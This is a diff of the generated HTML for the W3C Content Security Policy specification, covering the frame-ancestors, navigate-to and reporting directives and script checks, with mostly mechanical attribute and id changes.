         <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤②">value</a>, and a <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.3.2" id="directive-frame-ancestors"><span class="secno">6.3.2. </span><span class="content"><code>frame-ancestors</code></span><a class="self-link" href="#directive-frame-ancestors"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="frame-ancestors">frame-ancestors</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑦">URL</a></code>s which can
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="frame-ancestors">frame-ancestors</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑦">URL</a></code>s which can
   embed the resource using <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/obsolete.html#frame" id="ref-for-frame②">frame</a></code>, <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element" id="ref-for-the-iframe-element④">iframe</a></code>, <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element" id="ref-for-the-object-element⑦">object</a></code>, <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element" id="ref-for-the-embed-element⑤">embed</a></code>, or <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/obsolete.html#applet" id="ref-for-applet④"><code>applet</code></a> element. Resources can use this directive to avoid many UI
   Redressing <a data-link-type="biblio" href="#biblio-uisecurity">[UISECURITY]</a> attacks, by avoiding the risk of being embedded into
   potentially hostile contexts.</p>
@@ -4418,8 +4426,8 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 <pre>directive-name  = "frame-ancestors"
 directive-value = <a data-link-type="grammar" href="#grammardef-ancestor-source-list" id="ref-for-grammardef-ancestor-source-list">ancestor-source-list</a>
 
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-ancestor-source-list">ancestor-source-list</dfn> = ( <a data-link-type="grammar" href="#grammardef-ancestor-source" id="ref-for-grammardef-ancestor-source">ancestor-source</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace⑤">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-ancestor-source" id="ref-for-grammardef-ancestor-source①">ancestor-source</a>) ) / "<a data-link-type="grammar" href="#grammardef-none" id="ref-for-grammardef-none①">'none'</a>"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-ancestor-source">ancestor-source</dfn>      = <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source①">scheme-source</a> / <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source①">host-source</a> / "<a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self③③">'self'</a>"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-ancestor-source-list">ancestor-source-list</dfn> = ( <a data-link-type="grammar" href="#grammardef-ancestor-source" id="ref-for-grammardef-ancestor-source">ancestor-source</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace⑤">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-ancestor-source" id="ref-for-grammardef-ancestor-source①">ancestor-source</a>) ) / "<a data-link-type="grammar" href="#grammardef-none" id="ref-for-grammardef-none①">'none'</a>"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-ancestor-source">ancestor-source</dfn>      = <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source①">scheme-source</a> / <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source①">host-source</a> / "<a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self③③">'self'</a>"
 </pre>
     <p>The <code>frame-ancestors</code> directive MUST be ignored when contained in a policy
   declared via a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#meta" id="ref-for-meta①①">meta</a></code> element.</p>
@@ -4431,32 +4439,32 @@ directive-value = <a data-link-type="grammar" href="#grammardef-ancestor-source-
   more of the ancestors of <var>target</var> violate the <code>frame-ancestors</code> directive
   delivered with the response, and "<code>Allowed</code>" otherwise. This constitutes the <code>frame-ancestors</code> directive’s <a data-link-type="dfn" href="#directive-navigation-response-check" id="ref-for-directive-navigation-response-check②">navigation response check</a>:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>request</var>, <var>navigation response</var>, and <var>navigation type</var>, are
   unused in this algorithm, as <code>frame-ancestors</code> is concerned only
   with <var>navigation response</var>’s <a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors①">frame-ancestors</a> <a data-link-type="dfn" href="#directives" id="ref-for-directives②③">directive</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>check type</var> is "<code>source</code>", return "<code>Allowed</code>".</p>
       <p class="note" role="note"><span>Note:</span> The 'frame-ancestors' <a data-link-type="dfn" href="#directives" id="ref-for-directives②④">directive</a> is relevant only to the <var>target</var> <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context⑤">browsing context</a> and it has no impact on the <var>request</var>’s
   context.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>target</var> is not a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context⑤">nested browsing context</a>, return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>current</var> be <var>target</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>While <var>current</var> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context⑥">nested browsing context</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>document</var> be the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①⑨">Document</a></code> that <var>current</var> is <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through" id="ref-for-browsing-context-nested-through①">nested through</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>origin</var> be the result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-parser" id="ref-for-concept-url-parser①">URL parser</a> on the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#ascii-serialisation-of-an-origin" id="ref-for-ascii-serialisation-of-an-origin">ASCII serialization</a> of <var>document</var>’s <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-document-origin" id="ref-for-dom-document-origin">origin</a></code>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <a href="#match-url-to-source-list">§6.6.2.5 Does url match source list in origin with redirect count?</a> returns <code>Does Not Match</code> when
   executed upon <var>origin</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤③">value</a>, <var>policy</var>’s <a data-link-type="dfn" href="#policy-self-origin" id="ref-for-policy-self-origin③">self-origin</a>, and <code>0</code>, return "<code>Blocked</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>current</var> to <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context⑥">browsing context</a>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled" data-level="6.3.2.2" id="frame-ancestors-and-frame-options"><span class="secno">6.3.2.2. </span><span class="content"> Relation to <code>X-Frame-Options</code> </span><a class="self-link" href="#frame-ancestors-and-frame-options"></a></h5>
@@ -4466,14 +4474,14 @@ directive-value = <a data-link-type="grammar" href="#grammardef-ancestor-source-
   match, the load is cancelled. <a data-link-type="biblio" href="#biblio-rfc7034">[RFC7034]</a></p>
     <p>In order to allow backwards-compatible deployment, the <a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors③"><code>frame-ancestors</code></a> directive
   _obsoletes_ the <code>X-Frame-Options</code> header. If a resource is delivered with an <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦④">policy</a> that includes a <a data-link-type="dfn" href="#directives" id="ref-for-directives②⑤">directive</a> named <a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors④"><code>frame-ancestors</code></a> and whose <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition②①">disposition</a> is "<code>enforce</code>", then the <code>X-Frame-Options</code> header MUST be ignored.</p>
-    <p class="issue" id="issue-c6a38617"><a class="self-link" href="#issue-c6a38617"></a> Spell this out in more detail as part of defining <code>X-Frame-Options</code> integration with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response" id="ref-for-process-a-navigate-response①">process a navigate response</a> algorithm. <a href="https://github.com/whatwg/html/issues/1230">&lt;https://github.com/whatwg/html/issues/1230></a></p>
+    <p class="issue" id="issue-db2876b7"><a class="self-link" href="#issue-db2876b7"></a> Spell this out in more detail as part of defining <code>X-Frame-Options</code> integration with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response" id="ref-for-process-a-navigate-response①">process a navigate response</a> algorithm. <a href="https://github.com/whatwg/html/issues/1230">&lt;https://github.com/whatwg/html/issues/1230></a></p>
     <h4 class="heading settled" data-level="6.3.3" id="directive-navigate-to"><span class="secno">6.3.3. </span><span class="content"><code>navigate-to</code></span><a class="self-link" href="#directive-navigate-to"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="navigate-to">navigate-to</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑧">URL</a></code>s to which
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="navigate-to">navigate-to</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑧">URL</a></code>s to which
   a <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document">document</a> can initiate navigations by any means (<code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-a-element" id="ref-for-the-a-element①">a</a></code>, <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/forms.html#the-form-element" id="ref-for-the-form-element">form</a></code>, <code>window.location</code>, <code>window.open</code>, etc.). This is an enforcement on what navigations this <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document①">document</a> initiates <code>not</code> on what this <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document②">document</a> is allowed to navigate to.
   If the <a data-link-type="dfn" href="#form-action" id="ref-for-form-action">form-action</a> directive is present, the <a data-link-type="dfn" href="#navigate-to" id="ref-for-navigate-to②">navigate-to</a> directive
   will not act on navigations that are form submissions.</p>
-    <div class="example" id="example-118c27cf">
-     <a class="self-link" href="#example-118c27cf"></a> A <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document③">document</a> <var>initiator</var> has the following <code>Content-Security-Policy</code>: 
+    <div class="example" id="example-e4a97689">
+     <a class="self-link" href="#example-e4a97689"></a> A <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document③">document</a> <var>initiator</var> has the following <code>Content-Security-Policy</code>: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⑨">Content-Security-Policy</a>: navigate-to example.com
 </pre>
      <p>A <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-document" id="ref-for-concept-document④">document</a> <var>target</var> has the following <code>Content-Security-Policy</code>:</p>
@@ -4494,18 +4502,18 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   if the navigation violates the <code>navigate-to</code> directive’s constraints, and
   "<code>Allowed</code>" otherwise. This constitutes the <code>navigate-to</code>' directive’s <a data-link-type="dfn" href="#directive-pre-navigation-check" id="ref-for-directive-pre-navigation-check②">pre-navigation check</a>:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>If <var>navigation type</var> is "<code>form-submission</code>" and <var>policy</var> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives②⑥">directive</a> named "<code>form-action</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤④">value</a> contains a <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression③">source
   expression</a> that is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive④">ASCII case-insensitive</a> match for
   the "<a data-link-type="grammar" href="#grammardef-unsafe-allow-redirects" id="ref-for-grammardef-unsafe-allow-redirects"><code>'unsafe-allow-redirects'</code></a>" <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source①">keyword-source</a>, return "<code>Allowed</code>".</p>
       <p class="note" role="note"><span>Note:</span> If the 'unsafe-allow-redirects' flag is present we have to
   wait for the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③⑨">response</a> and take into account the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response④⓪">response</a>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-status" id="ref-for-concept-response-status">status</a> in <a href="#navigate-to-navigation-response">§6.3.3.2 navigate-to Navigation Response Check</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⑤">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="navigate-to Navigation Response Check" data-level="6.3.3.2" id="navigate-to-navigation-response"><span class="secno">6.3.3.2. </span><span class="content"> <code>navigate-to</code> Navigation Response Check </span><a class="self-link" href="#navigate-to-navigation-response"></a></h5>
@@ -4513,25 +4521,25 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context⑦">browsing context</a> (<var>target</var>), a string <var>check type</var> ("<code>source</code>" or "<code>response</code>"), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦⑥">policy</a> (<var>policy</var>), this
   algorithm returns "<code>Blocked</code>" if the navigation violates the <code>navigate-to</code> directive’s constraints, and "<code>Allowed</code>" otherwise. This constitutes the <code>navigate-to</code> directive’s <a data-link-type="dfn" href="#directive-navigation-response-check" id="ref-for-directive-navigation-response-check③">navigation response check</a>:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>target</var> is unused.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>check type</var> is "<code>response</code>", return "<code>Allowed</code>".</p>
       <p class="note" role="note"><span>Note:</span> The 'navigate-to' <a data-link-type="dfn" href="#directives" id="ref-for-directives②⑦">directive</a> is relevant only to the <var>request</var>’s context and it has no impact on the <var>target</var> <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context⑧">browsing context</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>navigation type</var> is "<code>form-submission</code>" and <var>policy</var> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives②⑧">directive</a> named "<code>form-action</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⑥">value</a> does not contain a <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression④">source
   expression</a> that is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive⑤">ASCII case-insensitive</a> match for
   the "<a data-link-type="grammar" href="#grammardef-unsafe-allow-redirects" id="ref-for-grammardef-unsafe-allow-redirects①"><code>'unsafe-allow-redirects'</code></a>" <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source②">keyword-source</a>, return "<code>Allowed</code>".</p>
       <p class="note" role="note"><span>Note:</span> If the 'unsafe-allow-redirects' flag is not present we have
   already checked the navigation in <a href="#navigate-to-pre-navigate">§6.3.3.1 navigate-to Pre-Navigation Check</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>navigation response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-status" id="ref-for-concept-response-status①">status</a> is a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#redirect-status" id="ref-for-redirect-status">redirect status</a>, return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⑦">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h3 class="heading settled" data-level="6.4" id="directives-reporting"><span class="secno">6.4. </span><span class="content"> Reporting Directives </span><a class="self-link" href="#directives-reporting"></a></h3>
@@ -4542,13 +4550,13 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
       Note: The <a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri②"><code>report-uri</code></a> directive is deprecated. Please use the <a data-link-type="dfn" href="#report-to" id="ref-for-report-to③"><code>report-to</code></a> directive instead. If the latter directive is present,
     this directive will be ignored. To ensure backwards compatibility, we
     suggest specifying both, like this: 
-     <div class="example" id="example-0ac8d9c4">
-      <a class="self-link" href="#example-0ac8d9c4"></a> 
+     <div class="example" id="example-eb4d610a">
+      <a class="self-link" href="#example-eb4d610a"></a> 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy②①">Content-Security-Policy</a>: ...; <a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri③">report-uri</a> https://endpoint.com; <a data-link-type="dfn" href="#report-to" id="ref-for-report-to④">report-to</a> groupname
 </pre>
      </div>
     </div>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="report-uri"><code>report-uri</code></dfn> directive defines a set of endpoints to which <a data-link-type="dfn" href="#violation-report" id="ref-for-violation-report">violation reports</a> will be sent when particular behaviors are prevented.</p>
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="report-uri"><code>report-uri</code></dfn> directive defines a set of endpoints to which <a data-link-type="dfn" href="https://w3c.github.io/webappsec-csp/#violation-report" id="ref-for-violation-report">violation reports</a> will be sent when particular behaviors are prevented.</p>
 <pre>directive-name  = "report-uri"
 directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-4.1" id="ref-for-section-4.1">uri-reference</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace⑥">required-ascii-whitespace</a> <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-4.1" id="ref-for-section-4.1①">uri-reference</a> )
 
@@ -4557,7 +4565,7 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
     <p>The directive has no effect in and of itself, but only gains meaning in
   combination with other directives.</p>
     <h4 class="heading settled" data-level="6.4.2" id="directive-report-to"><span class="secno">6.4.2. </span><span class="content"><code>report-to</code></span><a class="self-link" href="#directive-report-to"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="report-to"><code>report-to</code></dfn> directive defines a <a data-link-type="dfn" href="https://w3c.github.io/reporting/#group" id="ref-for-group">reporting
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="report-to"><code>report-to</code></dfn> directive defines a <a data-link-type="dfn" href="https://w3c.github.io/reporting/#group" id="ref-for-group">reporting
   group</a> to which violation reports ought to be sent <a data-link-type="biblio" href="#biblio-reporting">[REPORTING]</a>. The
   directive’s behavior is defined in <a href="#report-violation">§5.3 Report a violation</a>. The directive’s name
   and value are described by the following ABNF:</p>
@@ -4569,11 +4577,11 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   modular extension by other specifications. At the time this document was
   produced, the following stable documents extend CSP:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="biblio" href="#biblio-mix">[MIX]</a> defines <code>block-all-mixed-content</code></p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="biblio" href="#biblio-upgrade-insecure-requests">[UPGRADE-INSECURE-REQUESTS]</a> defines <code>upgrade-insecure-requests</code></p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="biblio" href="#biblio-sri">[SRI]</a> defines <code>require-sri-for</code></p>
     </ul>
     <p>Extensions to CSP MUST register themselves via the process outlined in <a data-link-type="biblio" href="#biblio-rfc7762">[RFC7762]</a>. In particular, note the criteria discussed in Section 4.2 of
@@ -4587,58 +4595,58 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥⓪">request</a> (<var>request</var>), a <a data-link-type="dfn" href="#directives" id="ref-for-directives②⑨">directive</a> (<var>directive</var>),
   and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦⑦">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination⑥">destination</a> is <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-destination-script-like" id="ref-for-request-destination-script-like①">script-like</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata⑤">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⑧">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>integrity expressions</var> be the set of <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression⑤">source expressions</a> in <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⑨">value</a> that match the <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source④">hash-source</a> grammar.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>integrity expressions</var> is not empty:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>integrity sources</var> be the result of executing the algorithm
   defined in <a href="https://www.w3.org/TR/SRI/#parse-metadata">Subresource Integrity §parse-metadata</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-integrity-metadata" id="ref-for-concept-request-integrity-metadata">integrity metadata</a>. <a data-link-type="biblio" href="#biblio-sri">[SRI]</a></p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>integrity sources</var> is "<code>no metadata</code>" or an empty set, skip
   the remaining substeps.</p>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>bypass due to integrity match</var> be <code>true</code>.</p>
-         <li data-md>
+         <li data-md="">
           <p>For each <var>source</var> in <var>integrity sources</var>:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥⓪">value</a> does not
   contain a <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression⑥">source expression</a> whose <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm①">hash-algorithm</a> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive">case-sensitive</a> match
   for <var>source</var>’s <code>hash-algo</code> component, and whose <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value④">base64-value</a> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive①">case-sensitive</a> match
   for <var>source</var>’s <code>base64-value</code>, then set <var>bypass due to
   integrity match</var> to <code>false</code>.</p>
           </ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>bypass due to integrity match</var> is <code>true</code>, return
   "<code>Allowed</code>".</p>
         </ol>
         <p class="note" role="note"><span>Note:</span> Here, we verify only that the <var>request</var> contains a set of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-integrity-metadata" id="ref-for-concept-request-integrity-metadata①">integrity metadata</a> which is a subset of the <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source⑤">hash-source</a> <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression⑦">source expressions</a> specified by <var>directive</var>. We rely on the browser’s enforcement of Subresource
   Integrity <a data-link-type="biblio" href="#biblio-sri">[SRI]</a> to block non-matching resources upon response.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥①">value</a> contains a <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression⑧">source
   expression</a> that is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive⑥">ASCII case-insensitive</a> match for
   the "<a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic"><code>'strict-dynamic'</code></a>" <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source③">keyword-source</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If the <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-parser-metadata" id="ref-for-concept-request-parser-metadata①">parser metadata</a> is <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted①">"parser-inserted"</a>, return "<code>Blocked</code>".</p>
           <p>Otherwise, return "<code>Allowed</code>".</p>
           <p class="note" role="note"><span>Note:</span> "<a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic①"><code>'strict-dynamic'</code></a>" is explained in more detail
   in <a href="#strict-dynamic-usage">§8.2 Usage of "'strict-dynamic'"</a>.</p>
         </ol>
-       <li data-md>
+       <li data-md="">
         <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥②">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="Script directives post-request check" data-level="6.6.1.2" id="script-post-request"><span class="secno">6.6.1.2. </span><span class="content"> Script directives post-request check </span><a class="self-link" href="#script-post-request"></a></h5>
@@ -4646,22 +4654,22 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥①">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response④②">response</a> (<var>response</var>),
   a <a data-link-type="dfn" href="#directives" id="ref-for-directives③⓪">directive</a> (<var>directive</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦⑧">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination⑦">destination</a> is <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-destination-script-like" id="ref-for-request-destination-script-like②">script-like</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata⑥">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥③">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-       <li data-md>
